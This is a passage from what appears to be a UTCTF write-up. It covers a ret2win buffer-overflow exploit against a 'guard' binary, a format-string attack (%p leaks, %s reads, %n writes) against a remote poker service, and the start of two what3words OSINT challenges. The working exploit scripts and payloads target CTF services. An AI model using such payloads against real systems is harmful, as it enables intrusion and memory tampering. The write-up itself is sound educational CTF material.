        4011f5:       89 7d dc                mov    DWORD PTR [rbp-0x24],edi
        4011f8:       48 8d 4d e0             lea    rcx,[rbp-0x20]
        4011fc:       8b 45 dc                mov    eax,DWORD PTR [rbp-0x24]
        4011ff:       ba 64 00 00 00          mov    edx,0x64
        401204:       48 89 ce                mov    rsi,rcx
        401207:       89 c7                   mov    edi,eax
        401209:       e8 42 fe ff ff          call   401050 <read@plt>
        40120e:       48 8d 45 e0             lea    rax,[rbp-0x20]
        401212:       48 8d 15 32 0e 00 00    lea    rdx,[rip+0xe32]        # 40204b <_IO_stdin_used+0x4b>
        401219:       48 89 d6                mov    rsi,rdx
        40121c:       48 89 c7                mov    rdi,rax
        40121f:       e8 3c fe ff ff          call   401060 <strcmp@plt>
        401224:       85 c0                   test   eax,eax
        401226:       75 11                   jne    401239 <read_input+0x4c>
        401228:       48 8d 05 29 0e 00 00    lea    rax,[rip+0xe29]        # 402058 <_IO_stdin_used+0x58>
        40122f:       48 89 c7                mov    rdi,rax
        401232:       e8 09 fe ff ff          call   401040 <puts@plt>
        401237:       eb 0f                   jmp    401248 <read_input+0x5b>
        401239:       48 8d 05 58 0e 00 00    lea    rax,[rip+0xe58]        # 402098 <_IO_stdin_used+0x98>
        401240:       48 89 c7                mov    rdi,rax
        401243:       e8 f8 fd ff ff          call   401040 <puts@plt>
        401248:       b8 00 00 00 00          mov    eax,0x0
        40124d:       c9                      leave
        40124e:       c3                      ret
  

  Notable points:

        4011f1: sub rsp,0x30
        4011f5: mov DWORD PTR [rbp-0x24],edi
        4011f8: lea rcx,[rbp-0x20]      ; buf starts at rbp-0x20 (32 bytes)
        ...
        4011ff: mov edx,0x64            ; nbytes = 100
        401209: call read@plt           ; read(fd, buf, 0x64)
        ...
        40121f: call strcmp@plt         ; strcmp(buf, "givemeflag\n")
        ...
        40124d: leave
        40124e: ret
  

  Based on the above:

  • The stack buffer at [rbp-0x20] is 32 bytes.
  • read is called with size 100 bytes.
  • The read can overflow the buffer and overwrite saved RBP and the saved RIP.
• secret_function():

    $ objdump -d -M intel pwnable | sed -n '/<secret_function>:/,/^$/p'
    000000000040124f <secret_function>:
        40124f:       55                      push   rbp
        401250:       48 89 e5                mov    rbp,rsp
        401253:       48 83 ec 40             sub    rsp,0x40
        401257:       c6 45 fb 32             mov    BYTE PTR [rbp-0x5],0x32
        40125b:       48 b8 47 46 54 5e 53    movabs rax,0x554955535e544647
        401262:       55 49 55 
        401265:       48 ba 47 06 40 56 6d    movabs rdx,0x4106456d56400647
        40126c:       45 06 41 
        40126f:       48 89 45 c0             mov    QWORD PTR [rbp-0x40],rax
        401273:       48 89 55 c8             mov    QWORD PTR [rbp-0x38],rdx
        401277:       48 b8 6d 45 01 06 59    movabs rax,0x6d4057590601456d
        40127e:       57 40 6d 
        401281:       48 ba 46 5a 06 5c 6d    movabs rdx,0x466d5b6d5c065a46
        401288:       5b 6d 46 
        40128b:       48 89 45 d0             mov    QWORD PTR [rbp-0x30],rax
        40128f:       48 89 55 d8             mov    QWORD PTR [rbp-0x28],rdx
        401293:       48 b8 46 5a 02 47 55    movabs rax,0x4f465a5547025a46
        40129a:       5a 46 4f 
        40129d:       48 89 45 df             mov    QWORD PTR [rbp-0x21],rax
        4012a1:       c7 45 f4 27 00 00 00    mov    DWORD PTR [rbp-0xc],0x27
        4012a8:       c7 45 fc 00 00 00 00    mov    DWORD PTR [rbp-0x4],0x0
        4012af:       eb 1b                   jmp    4012cc <secret_function+0x7d>
        4012b1:       8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]
        4012b4:       48 98                   cdqe
        4012b6:       0f b6 44 05 c0          movzx  eax,BYTE PTR [rbp+rax*1-0x40]
        4012bb:       32 45 fb                xor    al,BYTE PTR [rbp-0x5]
        4012be:       0f b6 c0                movzx  eax,al
        4012c1:       89 c7                   mov    edi,eax
        4012c3:       e8 68 fd ff ff          call   401030 <putchar@plt>
        4012c8:       83 45 fc 01             add    DWORD PTR [rbp-0x4],0x1
        4012cc:       8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]
        4012cf:       3b 45 f4                cmp    eax,DWORD PTR [rbp-0xc]
        4012d2:       7c dd                   jl     4012b1 <secret_function+0x62>
        4012d4:       b8 00 00 00 00          mov    eax,0x0
        4012d9:       c9                      leave
        4012da:       c3                      ret
  

  Notable points:

        401257: mov BYTE PTR [rbp-0x5],0x32   ; XOR key
        ...
        4012b6: movzx eax,BYTE PTR [rbp+rax*1-0x40]
        4012bb: xor   al,BYTE PTR [rbp-0x5]
        4012c3: call  putchar@plt
        4012cf: cmp   eax,DWORD PTR [rbp-0xc] ; loop over 0x27 bytes
  

  Based on this, secret_function() writes a byte array to the stack, XORs each byte with the key 0x32, and prints each decoded byte with putchar. The decoded output is the real flag.

Next, we perform dynamic analysis. First, generate a payload.bin to overflow the 32-byte buffer and overwrite the return address with 0x40124f:

import struct

payload=b'givemeflag\n\x00'+b'A'*(40-len(b'givemeflag\n\x00'))+struct.pack('<Q',0x40124f)
open('payload.bin','wb').write(payload)
print('len=',len(payload))

After creating payload.bin, we use gdb/pwndbg for dynamic analysis:

$ gdb -q ./pwnable                                                                                            

⚠️ warning: /home/kali/Desktop/pwndbg/gdbinit.py: No such file or directory
Reading symbols from ./pwnable...
(No debugging symbols found in ./pwnable)
(gdb) set pagination off
(gdb) b *0x40124e
Breakpoint 1 at 0x40124e
(gdb) run 1701604463 < payload.bin
Starting program: /home/kali/Desktop/wargame/guard/pwnable 1701604463 < payload.bin
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/x86_64-linux-gnu/libthread_db.so.1".
Hi. What do you want.
How rude! utflag{you're going to need a sneakier way in...}

Breakpoint 1, 0x000000000040124e in read_input ()
(gdb) x/6gx $rbp-0x30
0x4141414141414111:     ❌️ Cannot access memory at address 0x4141414141414111
(gdb) x/gx $rbp+8
0x4141414141414149:     ❌️ Cannot access memory at address 0x4141414141414149
(gdb) info registers rip rbp rsp
rip            0x40124e            0x40124e <read_input+97>
rbp            0x4141414141414141  0x4141414141414141
rsp            0x7fffffffd4e8      0x7fffffffd4e8
(gdb) ni
0x000000000040124f in secret_function ()
(gdb) info registers rip
rip            0x40124f            0x40124f <secret_function>

From the debugger output, these results are important:

Breakpoint 1, 0x000000000040124e in read_input ()
rip 0x40124e <read_input+97>
rbp 0x4141414141414141 ; --> payload worked
...
0x000000000040124f in secret_function ()
rip 0x40124f <secret_function> ; --> now executing secret_function.

This indicates:

• The saved frame pointer is overwritten by the payload.
• Single-stepping over the ret transfers execution into secret_function().
• This is conclusive evidence of control-flow hijack.

Based on the analysis, we need to build a payload with an exact 40-byte offset to overwrite the saved RIP and set it to 0x40124f (the address of secret_function).

Exploit code

Here is the exploit code:

#!/usr/bin/env python3
"""
Exploit for guard/pwnable

Root bug:
- Stack buffer overflow in read_input(): read(0, buf, 0x64) with buf size 0x20.
- Overwrite saved RIP and return into secret_function().
"""

import struct
import subprocess
from pathlib import Path

BINARY = Path(__file__).with_name("pwnable")

# Gate in main:
#   atoi(argv[1]) - 0x656c6c6f == 0
HELLO_MAGIC_DEC = str(0x656C6C6F)

# Function addresses from non-PIE binary
SECRET_FUNCTION = 0x40124F
OFFSET_TO_RIP = 40  # 0x20 buffer + 8 saved RBP + RIP at +0x28


def build_payload() -> bytes:
    """Build overflow payload that safely passes strcmp() first."""
    prefix = b"givemeflag\n\x00"
    padding = b"A" * (OFFSET_TO_RIP - len(prefix))
    return prefix + padding + struct.pack("<Q", SECRET_FUNCTION)


def main() -> None:
    payload = build_payload()

    # stdbuf -o0 ensures putchar() output is flushed before expected crash.
    proc = subprocess.run(
        ["stdbuf", "-o0", str(BINARY), HELLO_MAGIC_DEC],
        input=payload,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        check=False,
    )

    output = proc.stdout.decode("latin-1", errors="ignore")
    print(output)

    # Expected: process may crash after secret_function returns (invalid next RIP).
    print(f"[i] exit code: {proc.returncode}")


if __name__ == "__main__":
    main()

Result:

$ python3 solve.py  
Hi. What do you want.
How rude! utflag{you're going to need a sneakier way in...}
utflag{gu4rd_w4s_w34ker_th4n_i_th0ught}
[i] exit code: -4

Technical Summary

Vulnerability Classification

• CWE-121: Stack-based Buffer Overflow
• Classic ret2win control-flow hijack due to unsafe read length.

Techniques Used

• Static RE with symbol and disassembly mapping.
• Stack frame/offset reasoning from assembly.
• Runtime debugger validation of overwritten control flow.
• Payload engineering with exact RIP offset and static function address.

Challenge Source Code

Challenge’s Github Repository: rude_guard

Come play some poker! You’ve got 500 chips and a shot to double up. The flag’s behind a win condition, but a good poker player knows there’s always more than one way to win.

nc challenge.utctf.live 7255

Challenge Overview

This is a pwnable challenge with no binary or source provided to players. I first used netcat to inspect the service:

Based on the screenshot, this is a poker game. The player and dealer each start with 500 chips. The player provides a name and can select one of four actions: check, call, raise <n>, or fold.

Challenge Analysis

After many netcat sessions, we determined the game’s flow:

• The service prints a banner and prompts Enter your name:; it stores the input and prints a welcome message that includes the name.
• If the player chooses to play:
  • the poker hand state machine runs (preflop/flop/turn/river),
  • chips are settled,
  • control returns to the menu.
• On exit the service checks an end condition and prints the flag if it is satisfied.

Because the program echoes the supplied name back to stdout, we suspected a format-string vulnerability. The vulnerable code might look like this:

// input name and store intro a c-string
char *playerName = name
printf("Welcome to the table, ");
printf(playerName);

Run netcat again to check this prediction, we have this result:

This confirms the suspicion. Next we needed to determine the win condition, so I tried pushing the game into boundary states by always using raise 480. I chose raise 480 because raising less than 480 produces a smaller pot that doesn’t reach the maximum stage, while raising 490 or 500 is often rejected.

Both players start with 500 chips, so the most extreme distribution is 1000-0. I used that hypothesis in a script to check the win condition:

import argparse
import re
import socket
import time
from pathlib import Path
from typing import Optional, Tuple

HOST = "challenge.utctf.live"
PORT = 7255
PLAY_PROMPT = "Play a hand? (y to play / n to exit / t to toggle Unicode suits [currently on]):"
ACTION_PREFIX = "Action ("


def send_line(sock: socket.socket, line: str) -> None:
    sock.sendall((line + "\n").encode())


def recv_until(sock: socket.socket, buf: str, marker: str, timeout: float = 4.0) -> Tuple[str, str]:
    end = time.time() + timeout
    while marker not in buf:
        if time.time() > end:
            raise TimeoutError(f"timeout waiting for marker: {marker}")
        data = sock.recv(4096)
        if not data:
            raise ConnectionError("remote closed")
        buf += data.decode(errors="replace")
    idx = buf.index(marker) + len(marker)
    return buf[:idx], buf[idx:]


def recv_action_prompt(sock: socket.socket, buf: str, timeout: float = 4.0) -> Tuple[str, str]:
    end = time.time() + timeout
    while True:
        idx = buf.find(ACTION_PREFIX)
        if idx != -1:
            colon = buf.find(":", idx)
            if colon != -1:
                prompt = buf[idx : colon + 1]
                return prompt, buf[colon + 1 :]

        if time.time() > end:
            raise TimeoutError("timeout waiting action prompt")

        data = sock.recv(4096)
        if not data:
            raise ConnectionError("remote closed")
        buf += data.decode(errors="replace")


def parse_last_chips(text: str) -> Tuple[Optional[int], Optional[int]]:
    m = re.findall(r"Your chips:\s*(\d+)\s*\|\s*Dealer chips:\s*(\d+)", text)
    if not m:
        return None, None
    y, d = m[-1]
    return int(y), int(d)


def play_to_menu(sock: socket.socket, buf: str, transcript: str, aggressive: bool = False) -> Tuple[str, str]:
    # Keep the hand moving with check/call so showdown can resolve naturally.
    deadline = time.time() + 12.0
    while time.time() < deadline:
        if PLAY_PROMPT in buf:
            cut = buf.index(PLAY_PROMPT) + len(PLAY_PROMPT)
            transcript += buf[:cut]
            buf = buf[cut:]
            return buf, transcript

        idx = buf.find(ACTION_PREFIX)
        if idx != -1:
            colon = buf.find(":", idx)
            if colon != -1:
                prompt = buf[idx : colon + 1]
                transcript += buf[: colon + 1]
                buf = buf[colon + 1 :]
                if "check" in prompt:
                    send_line(sock, "check")
                elif "call" in prompt:
                    send_line(sock, "call")
                else:
                    send_line(sock, "fold")
                continue

        try:
            data = sock.recv(4096)
        except (TimeoutError, socket.timeout):
            continue

        if not data:
            break
        chunk = data.decode(errors="replace")
        buf += chunk
        transcript += chunk

    raise TimeoutError("did not return to play menu in time")


def single_attempt(name: str, aggressive: bool = False, max_hands: int = 2) -> Tuple[bool, str, Tuple[Optional[int], Optional[int]]]:
    transcript = ""
    with socket.create_connection((HOST, PORT), timeout=8) as sock:
        sock.settimeout(1.5)
        buf = ""

        # Login
        chunk, buf = recv_until(sock, buf, "Enter your name:")
        transcript += chunk
        send_line(sock, name)

        # Menu -> start hand 1
        chunk, buf = recv_until(sock, buf, PLAY_PROMPT)
        transcript += chunk
        send_line(sock, "y")

        # Hand 1: force near all-in from SB spot
        prompt, buf = recv_action_prompt(sock, buf)
        transcript += prompt
        if "call 10 / raise <n> / fold" in prompt:
            send_line(sock, "raise 480")
        elif "check / raise <n> / fold" in prompt:
            send_line(sock, "raise 480")
        else:
            send_line(sock, "fold")

        # Finish hand 1 and return to menu
        buf, transcript = play_to_menu(sock, buf, transcript, aggressive=aggressive)
        y1, d1 = parse_last_chips(transcript)

        y2, d2 = y1, d1
        hands_played = 1
        while hands_played < max_hands:
            if (y2, d2) == (1000, 0):
                break
            if y2 is None or d2 is None:
                break
            if y2 <= 0 or d2 <= 0:
                break

            send_line(sock, "y")
            buf, transcript = play_to_menu(sock, buf, transcript, aggressive=aggressive)
            y2, d2 = parse_last_chips(transcript)
            hands_played += 1

        # Exit cleanly
        send_line(sock, "n")
        end = time.time() + 1.0
        while time.time() < end:
            try:
                data = sock.recv(4096)
            except (TimeoutError, socket.timeout):
                break
            if not data:
                break
            transcript += data.decode(errors="replace")

    return (y2, d2) == (1000, 0), transcript, (y1, d1)


def main() -> int:
    parser = argparse.ArgumentParser(description="Retry remote sessions until chips become exactly 1000-0")
    parser.add_argument("--attempts", type=int, default=400, help="Maximum sessions to try")
    parser.add_argument("--aggressive", action="store_true", help="Use more assertive line selection and play extra hands")
    parser.add_argument("--max-hands", type=int, default=2, help="Maximum hands to play per session")
    parser.add_argument(
        "--save",
        type=Path,
        default=Path("blind/1000_0_transcript.txt"),
        help="Where to save the successful transcript",
    )
    args = parser.parse_args()

    for i in range(1, args.attempts + 1):
        try:
            ok, transcript, hand1 = single_attempt(
                name=f"hunt{i}",
                aggressive=args.aggressive,
                max_hands=max(2, args.max_hands),
            )
            y, d = parse_last_chips(transcript)
            print(f"[attempt {i}] hand1={hand1} final={y}-{d}")
            if ok:
                args.save.parent.mkdir(parents=True, exist_ok=True)
                args.save.write_text(transcript, encoding="utf-8")
                print(f"[+] Hit target 1000-0 on attempt {i}")
                print(f"[+] Saved transcript to {args.save}")
                return 0
        except Exception as exc:
            print(f"[attempt {i}] error: {exc}")
            time.sleep(0.08)

    print("[!] END")
    return 1


if __name__ == "__main__":
    raise SystemExit(main())

Run command:

python3 name.py --attempts 10 --aggressive --max-hands 4

Here is the result:

[attempt 1] hand1=(990, 10) final=990-10
[attempt 2] hand1=(10, 990) final=10-990
[attempt 3] hand1=(990, 10) final=990-10
[attempt 4] hand1=(990, 10) final=990-10
[attempt 5] hand1=(520, 480) final=460-540
[attempt 6] hand1=(990, 10) final=990-10
[attempt 7] hand1=(10, 990) final=10-990
[attempt 8] hand1=(10, 990) final=10-990
[attempt 9] hand1=(10, 990) final=10-990
[attempt 10] hand1=(990, 10) final=990-10
[!] Target 1000-0 not reached within attempt budget

I automated raise 480 for each hand. The output shows different outcomes for the same input, indicating settlement inconsistencies; the behavior is stochastic and not reliably exploitable remotely.

We did not observe 1000-0, so it is likely not the required win condition. We hypothesize the win gate may be based on your_chips > 1000.

From this analysis, we reconstructed a plausible implementation of the service:

#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char name[256];
    int your_chips = 500;
    int dealer_chips = 500;

    puts("Enter your name:");
    fgets(name, sizeof(name), stdin);

    // Vulnerability: uncontrolled format string
    printf("Welcome to the table, ");
    printf(name);                  // <-- format string vulnerability
    printf("!\n");

    while (1) {
        printf("Your chips: %d | Dealer chips: %d\n", your_chips, dealer_chips);
        printf("Play a hand? (y to play / n to exit): ");

        char cmd[16];
        if (!fgets(cmd, sizeof(cmd), stdin)) break;

        if (cmd[0] == 'n') {
            // Inferred win gate from behavior
            if (your_chips > 1000) {
                puts("utflag{...}");
            } else {
                puts("Better luck next time.");
            }
            break;
        }

        // Poker hand engine here
        // ... complex game logic omitted in real service
    }

    return 0;
}

Now we have the basic information. Next, we’ll create scripts to dynamically analyze the service:

1. Confirm leak primitive (%p) using payloads like %i$p across many indices.
2. Confirm read primitive (%s) using payloads like %i$s for candidate indices.
3. Confirm write primitive (%n), e.g. %1000c%6$n to alter dealer chips or %1000c%7$n to alter player chips.

Here is the script for step 1 and 2:

import re
import socket
import string
from typing import Optional

HOST = "challenge.utctf.live"
PORT = 7255
FLAG_RE = re.compile(r"[A-Za-z0-9_]*\{[^\n{}]{3,}\}")


def get_welcome_value(payload: str, timeout: float = 0.65) -> Optional[str]:
    try:
        s = socket.create_connection((HOST, PORT), timeout=2.0)
    except OSError:
        return None
    s.settimeout(timeout)
    try:
        try:
            banner = s.recv(4096).decode(errors="replace")
        except (TimeoutError, socket.timeout, OSError):
            return None
        if "Enter your name:" not in banner:
            return None
        s.sendall((payload + "\n").encode())

        out = ""
        for _ in range(4):
            try:
                data = s.recv(4096)
            except (TimeoutError, socket.timeout, OSError):
                break
            if not data:
                break
            out += data.decode(errors="replace")
            if "Play a hand?" in out:
                break

        m = re.search(r"Welcome to the table, (.*?)!", out, re.S)
        if not m:
            return None
        return m.group(1)
    finally:
        s.close()


def printable(s: str) -> str:
    return "".join(ch if ch in string.printable and ch not in "\r\n\t" else "." for ch in s)


def main() -> int:
    print("[*] Stage 1: leak stack args with %i$p")
    ptr_map: dict[int, str] = {}
    for i in range(1, 70):
        payload = f"%{i}$p"
        v = get_welcome_value(payload)
        if v is None:
            continue
        v = v.strip()
        ptr_map[i] = v
        if i % 10 == 0:
            print(f"    - scanned {i} offsets")

    for i in sorted(ptr_map):
        v = ptr_map[i]
        if v not in ("(nil)", "0x0"):
            print(f"[p] {i:3d}: {v}")

    print("\n[*] Stage 2: dereference candidate pointers with %i$s")
    candidates = []
    for i, v in ptr_map.items():
        if not v.startswith("0x"):
            continue
        try:
            n = int(v, 16)
        except ValueError:
            continue
        if n <= 0x1000:
            continue
        candidates.append(i)

    seen = set()
    for i in sorted(set(candidates)):
        payload = f"%{i}$s"
        v = get_welcome_value(payload, timeout=0.55)
        if not v:
            continue
        pv = printable(v)
        if len(pv) < 4:
            continue
        key = pv[:80]
        if key in seen:
            continue
        seen.add(key)
        print(f"[s] {i:3d}: {pv[:220]}")
        m = FLAG_RE.search(v)
        if m:
            print(f"[+] FLAG FOUND: {m.group(0)}")
            return 0

    print("[!] No direct flag string leaked in scanned offsets.")
    return 1


if __name__ == "__main__":
    raise SystemExit(main())

Here is the output of this code:

$ python3 fmt_scan.py
[*] Stage 1: leak stack args with %i$p
    - scanned 10 offsets
    - scanned 20 offsets
    - scanned 30 offsets
    - scanned 40 offsets
    - scanned 50 offsets
    - scanned 60 offsets
[p]   1: 0x7ffda1665450
[p]   4: 0x16
[p]   5: 0x16
[p]   6: 0x7ffd96938398
[p]   7: 0x7ffdbcfd166c
[p]   8: 0x7ffdf83d1d10
[p]   9: 0x4034c3
[p]  13: 0x7ffd3bc0efe5
[p]  20: 0x400040
[p]  21: 0xd
[p]  22: 0x7fff1af2fc40
[p]  23: 0x7ffee3cbcc99
[p]  24: 0x7f347cca65e0
[p]  25: 0x40372d
[p]  26: 0x7f0d657a72e8
[p]  27: 0x4036e0
[p]  29: 0x1f4000001f4
[p]  30: 0x7fff40a166d0
[p]  33: 0x7f6b5ea5b083
[p]  34: 0x100000006
[p]  35: 0x7ffe50956d78
[p]  36: 0x16ec977a0
[p]  37: 0x403464
[p]  38: 0x4036e0
[p]  39: 0x3eac8cb44490c1ff
[p]  40: 0x401230
[p]  41: 0x7ffe13e278e0
[p]  44: 0xc0a0861aa8ffdda8
[p]  45: 0x10b87249fefe49d8
[p]  49: 0x1
[p]  50: 0x7fffd3a32788
[p]  51: 0x7ffe10122eb8
[p]  52: 0x7fbe22635190
[p]  55: 0x401230
[p]  56: 0x7ffd42ec7890
[p]  59: 0x40125e
[p]  60: 0x7ffe71cfff88
[p]  61: 0x1c
[p]  62: 0x1
[p]  63: 0x7ffd5b852e84
[p]  65: 0x7fffeaf87e92
[p]  66: 0x7ffd76754ea6
[p]  67: 0x7ffda9ebeeb1
[p]  68: 0x7fffa6340ec3
[p]  69: 0x7ffc39fbded1

[*] Stage 2: dereference candidate pointers with %i$s
[s]   1: Welcome to the table, 00  each               ..
[s]   9: .E...E.
[s]  13: 3978
[s]  22: .gTn.
[s]  23: x86_64
[s]  24: ....UH..t.
[s]  25: H...H9.u.H...[]A\A]A^A_.ff....
[s]  27: ....AWL.=#7
[s]  33: ...).
[s]  35: ......
[s]  37: ....UH..H..
[s]  40: ....1.I..^H..H...PTI..P7@
[s]  50: .~....
[s]  51: ...W..
[s]  59: .......f....
[s]  63: /build/poker
[s]  65: MAIL=/var/mail/poker
[s]  66: USER=poker
[s]  67: HOME=/home/poker
[s]  68: LOGNAME=poker
[s]  69: PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
[!] No direct flag string leaked in scanned offsets.

Interpretation:

• The format string is interpreted by the service.
• Positional argument access works.
• The service dereferences argument pointers and reads memory as C-strings.

Next, for stage 3, I wrote this script:

import argparse
import re
import socket
import time
from pathlib import Path


DEFAULT_HOST = "challenge.utctf.live"
DEFAULT_PORT = 7255
ENTER_PROMPT = "Enter your name:"
PLAY_PROMPT = "Play a hand?"
ACTION_PROMPT = "Action ("


def recv_some(sock: socket.socket, timeout: float) -> str:
    sock.settimeout(timeout)
    chunks = []
    while True:
        try:
            data = sock.recv(4096)
        except (TimeoutError, socket.timeout):
            break
        if not data:
            break
        chunks.append(data)
        if len(data) < 4096:
            break
    return b"".join(chunks).decode(errors="replace")


def send_line(sock: socket.socket, line: str) -> None:
    sock.sendall((line + "\n").encode())


def wait_for_marker(sock: socket.socket, marker: str, timeout: float, transcript: str) -> tuple[bool, str]:
    end = time.time() + timeout
    buf = transcript
    while time.time() < end:
        if marker in buf:
            return True, buf
        piece = recv_some(sock, timeout=0.35)
        if piece:
            buf += piece
    return marker in buf, buf


def extract_summary(transcript: str) -> str:
    welcome = re.search(r"Welcome to the table, (.*?)!", transcript, re.S)
    chips = re.findall(r"Your chips:\s*(\d+)\s*\|\s*Dealer chips:\s*(\d+)", transcript)
    parts = []
    if welcome:
        w = welcome.group(1).replace("\n", " ").strip()
        if len(w) > 80:
            w = w[:77] + "..."
        parts.append(f"welcome={w!r}")
    if chips:
        y, d = chips[-1]
        parts.append(f"chips={y}-{d}")
    if "{" in transcript and "}" in transcript:
        m = re.search(r"[A-Za-z0-9_]*\{[^\n{}]+\}", transcript)
        if m:
            parts.append(f"flag={m.group(0)}")
    return " | ".join(parts) if parts else "no-summary"


def run_single(
    host: str,
    port: int,
    name_payload: str,
    queued_lines: list[str],
    auto_next: bool,
    timeout: float,
) -> tuple[int, str]:
    transcript = ""
    queue = list(queued_lines)

    with socket.create_connection((host, port), timeout=8) as sock:
        sock.settimeout(1.2)

        ok, transcript = wait_for_marker(sock, ENTER_PROMPT, timeout, transcript)
        if not ok:
            return 1, transcript

        send_line(sock, name_payload)
        print(f"[send:name] {name_payload}")

        # Read response right after name payload.
        transcript += recv_some(sock, timeout=1.0)

        if auto_next and queue:
            end = time.time() + timeout
            while queue and time.time() < end:
                # Keep pulling output until one of the prompts appears.
                transcript += recv_some(sock, timeout=0.4)
                if PLAY_PROMPT in transcript or ACTION_PROMPT in transcript:
                    line = queue.pop(0)
                    send_line(sock, line)
                    print(f"[send] {line}")
                    transcript += recv_some(sock, timeout=0.8)

        elif queue:
            # Non-auto mode: send all queued lines immediately.
            for line in queue:
                send_line(sock, line)
                print(f"[send] {line}")
                transcript += recv_some(sock, timeout=0.8)

        # Final drain.
        transcript += recv_some(sock, timeout=1.0)

    return 0, transcript


def main() -> int:
    parser = argparse.ArgumentParser(description="Send payloads to poker service and capture transcript")
    parser.add_argument("--host", default=DEFAULT_HOST, help="Target host")
    parser.add_argument("--port", type=int, default=DEFAULT_PORT, help="Target port")
    parser.add_argument("--name", default=None, help="Payload to send as name")
    parser.add_argument(
        "--batch-name",
        action="append",
        default=[],
        help="Batch mode: payload as name (repeat this flag for multiple payloads)",
    )
    parser.add_argument(
        "--send",
        action="append",
        default=[],
        help="Additional lines to send after login (can be repeated, e.g. --send y --send n)",
    )
    parser.add_argument(
        "--auto-next",
        action="store_true",
        help="Send queued --send lines when Play/Action prompt appears",
    )
    parser.add_argument(
        "--auto-exit",
        action="store_true",
        help="Ensure command 'n' is queued (useful in batch mode)",
    )
    parser.add_argument("--timeout", type=float, default=8.0, help="Overall wait timeout per stage")
    parser.add_argument("--save", type=Path, default=None, help="Optional file path to save full transcript")
    args = parser.parse_args()

    payloads: list[str] = []
    if args.name is not None:
        payloads.append(args.name)
    payloads.extend(args.batch_name)

    if not payloads:
        print("[-] Provide --name or at least one --batch-name")
        return 2

    queue = list(args.send)
    if args.auto_exit and "n" not in queue:
        queue.append("n")

    if len(payloads) == 1:
        rc, transcript = run_single(
            host=args.host,
            port=args.port,
            name_payload=payloads[0],
            queued_lines=queue,
            auto_next=args.auto_next,
            timeout=args.timeout,
        )
        if rc != 0:
            print("[-] Did not receive name prompt")
            print(transcript[-1000:])
            return rc

        if args.save is not None:
            args.save.parent.mkdir(parents=True, exist_ok=True)
            args.save.write_text(transcript, encoding="utf-8")
            print(f"[+] Saved transcript to {args.save}")

        print("\n===== Transcript Tail =====")
        print(transcript[-2500:])
        return 0

    save_dir = args.save
    if save_dir is not None:
        save_dir.parent.mkdir(parents=True, exist_ok=True)

    ok_count = 0
    print(f"[*] Batch mode: {len(payloads)} payload(s)")
    for idx, payload in enumerate(payloads, start=1):
        print(f"\n=== [{idx}/{len(payloads)}] payload={payload!r} ===")
        try:
            rc, transcript = run_single(
                host=args.host,
                port=args.port,
                name_payload=payload,
                queued_lines=queue,
                auto_next=args.auto_next,
                timeout=args.timeout,
            )
        except Exception as exc:
            print(f"[!] error: {exc}")
            continue

        if rc != 0:
            print("[-] no name prompt")
            continue

        ok_count += 1
        print(f"[summary] {extract_summary(transcript)}")

        if save_dir is not None:
            out_path = save_dir.with_name(f"{save_dir.stem}_{idx}{save_dir.suffix or '.txt'}")
            out_path.write_text(transcript, encoding="utf-8")
            print(f"[+] saved {out_path}")

    print(f"\n[*] Batch done: {ok_count}/{len(payloads)} succeeded")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())

Run command:

$ python3 send_payload.py --name %1000c%7\$n --send n --auto-next
$ python3 send_payload.py --name %1000c%6\$n --send n --auto-next

Result:

From the results, the mapping appears to be:

• your_chips → format argument #7
• dealer_chips → format argument #6

Exploitation

Based on the analysis, the final exploit script is:

import re
import socket

HOST = "challenge.utctf.live"
PORT = 7255
FLAG_RE = re.compile(r"[A-Za-z0-9_]*\{[^\n{}]+\}")


def recv_some(sock: socket.socket, rounds: int = 8) -> str:
    out = ""
    for _ in range(rounds):
        try:
            data = sock.recv(4096)
        except (TimeoutError, socket.timeout):
            break
        if not data:
            break
        out += data.decode(errors="replace")
    return out


def main() -> int:
    # Vulnerability: server does printf(name) directly.
    # %1001c prints 1001 chars, then %7$n writes 1001 into the integer pointer at arg #7.
    # In this binary, arg #7 maps to your chip counter.
    payload = "%1001c%7$n"

    with socket.create_connection((HOST, PORT), timeout=8) as sock:
        sock.settimeout(1.2)

        banner = recv_some(sock, rounds=4)
        if "Enter your name:" not in banner:
            print("[-] Unexpected banner, cannot continue")
            return 1

        sock.sendall((payload + "\n").encode())
        text = banner + recv_some(sock, rounds=10)

        m = re.search(r"Your chips:\s*(\d+)\s*\|\s*Dealer chips:\s*(\d+)", text)
        if m:
            print(f"[*] Chip state after payload: you={m.group(1)} dealer={m.group(2)}")

        # Exit cleanly; service prints final result path, including flag when threshold is met.
        sock.sendall(b"n\n")
        text += recv_some(sock, rounds=10)

        fm = FLAG_RE.search(text)
        if not fm:
            print("[-] Flag not found. Tail output:")
            print("\n".join(text.splitlines()[-20:]))
            return 1

        print(f"[+] FLAG: {fm.group(0)}")
        return 0


if __name__ == "__main__":
    raise SystemExit(main())

Run result:

$ python3 exploit.py
[*] Chip state after payload: you=1001 dealer=500
[+] FLAG: utflag{counting_chars_not_cards}

Technical Summary

Techniques Used

• Black-box protocol reverse engineering
• Format string triad (%p, %s, %n)
• Positional argument mapping
• Deterministic state overwrite for win-gate bypass

Vulnerability Classification

• CWE-134: Uncontrolled Format String
• Impact: arbitrary memory read/write in process context

Lessons Learned

• In interactive game services, always test pre-game user fields first.
• If a challenge hints “more than one way to win”, exploit path likely bypasses intended game logic.
• %n often turns a simple leak into complete game-state control.

Challenge Source Code

Challenge’s Github Repository: small_blind

The three words I would use to describe this location are…

Flag format: utflag{word1.word2.word3}

Osint Path

Based on the challenge description, we predicted our task is to correctly figure out where the picture was taken, then find that location on https://what3words.com/

First, take a look at the picture:

– From the picture, this is a Merchandise & Gift Shop and the photographer stood in front of the shop to take the photo. – Behind the shop, there are many trees and some electric poles.

Searching “Merchandise and Gift Shop” on Google Maps, we found this place:

Clicking the location we found, it matches the shop in the picture:

Opening https://what3words.com/ and locating the shop, based on the picture we predicted this is the zone to search:

Brute-forcing all locations in the red zone, we found the flag at this point:

The three words I would use to describe this location are…

Flag format: utflag{word1.word2.word3}

Osint Path

Based on the challenge description, we needed to identify where the picture was taken and locate it on https://what3words.com/.

First, look at the picture:

• The image shows inverted writing reflected on the water’s surface; this appears to be a park or greenspace.

